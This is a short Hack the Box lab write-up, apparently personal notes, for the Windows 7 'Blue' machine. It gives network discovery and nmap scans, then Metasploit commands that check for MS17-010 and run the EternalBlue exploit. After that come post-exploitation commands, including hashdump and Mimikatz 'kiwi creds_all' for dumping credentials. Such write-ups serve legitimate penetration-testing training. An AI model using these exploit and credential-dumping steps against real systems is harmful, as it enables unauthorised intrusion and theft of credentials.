📦
HTB - Hack the Box
  • 📦Hack the Box
  • 📠Machines
    • Ambassador
    • Precious
    • Blue
    • Academy
    • Dev
    • Butler
    • Blackpearl
Powered by GitBook
On this page
  • Enumeration
  • Metasploit way
  • Manual way
  • Useful commands in windows
  • Windows shell
  • Meterpreter
Edit on GitHub
  1. Machines

Blue

PreviousPreciousNextAcademy

Last updated 2 years ago

Enumeration

sudo netdiscover -r 10.0.2.0/24

IP -> 10.0.2.6

NMAP

nmap -T4 -p- -A <IP>

Metasploit way

  • smb open

  • windows 7 Professional 7601 Service Pack 1

This means it was a possibility to be vulnerable to eternal blue 0 smb_ms17_010

use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS $IP
run

  • Run eternal blue explit to root the machine

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $IP
run

Can try to change the payload to meterpetrer with staged payload

Manual way

Useful commands in windows

Windows shell

  • hashdump

  • getuid

  • sysinfo

  • route print

  • arp -a

  • netstat -ano

  • ps

Meterpreter

  • enter in shell (shell)

  • kiwi

    • help

    • creds_all

📠
Github Page Link